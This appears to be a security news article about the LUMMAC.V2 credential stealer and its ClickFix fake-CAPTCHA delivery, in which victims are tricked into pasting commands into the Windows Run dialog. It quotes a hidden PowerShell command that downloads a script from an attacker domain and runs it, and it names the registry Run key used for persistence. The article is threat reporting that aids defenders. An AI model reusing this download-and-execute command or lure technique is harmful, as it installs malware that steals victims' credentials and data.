Cybersecurity experts have identified a sophisticated evolution of the LUMMAC credential stealer, now rewritten from C to C++ and operating with enhanced capabilities.
This new variant, designated LUMMAC.V2, has been observed targeting a wide range of applications including browsers, cryptocurrency wallets, password managers, remote desktop applications, email clients, and instant messaging platforms.
The malware’s primary function is to exfiltrate sensitive information such as credentials, logins, emails, personal details, system information, screenshots, and cookies, subsequently compressing this data into a ZIP archive for transmission over HTTP connections.
.png
)
What makes LUMMAC.V2 particularly dangerous is its distribution method, which relies heavily on social engineering rather than technical exploits.
The malware propagates through malicious links embedded in search results, especially those related to cracked software, popular movies, or music releases.
When users click these links, they’re redirected to deceptive websites that present as security verification pages with fake CAPTCHA challenges.
Google Cloud Security Community researchers have identified that the ClickFix technique forms the cornerstone of LUMMAC.V2’s attack methodology.
This technique tricks users into executing commands without realizing they’re initiating malware installation.
The analysis reveals multiple delivery variations, though all begin with the same social engineering approach.
Malware Lifecycle
The ClickFix technique operates by instructing users to perform seemingly innocuous actions that trigger malware execution.
When victims land on the fake CAPTCHA page, they’re guided to press Windows+R to open the Run dialog box, then instructed to press CTRL+V to paste a command that has been surreptitiously copied to their clipboard, and finally to press Enter to execute it.
.webp)
The lifecycle shows an example of this deceptive page in action, while the below image reveals the underlying website’s source code designed to execute this attack.
.gif)
Behind the scenes, a PowerShell command executes with the “-W Hidden” parameter to prevent any console window from appearing. A typical command looks like:-
PowerShell.exe -W Hidden -command $url = 'https://finalstepgo[.]com/uploads/pnk3.txt'; $response = Invoke-WebRequest -Uri $url -UseBasicParsing; $text = $response. Content; iex $textThis command downloads and executes additional malicious payloads, establishing persistence by creating registry entries under HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run.
This ensures the malware executes automatically at each system startup, maintaining its presence on infected systems.
The LUMMAC.V2 campaign represents a significant threat not only due to its extensive data theft capabilities but also because it exploits human behavior rather than technical vulnerabilities, making traditional security measures less effective at prevention.
Are you from the SOC and DFIR Teams? – Analyse Real time Malware Incidents with ANY.RUN -> Start Now for Free.
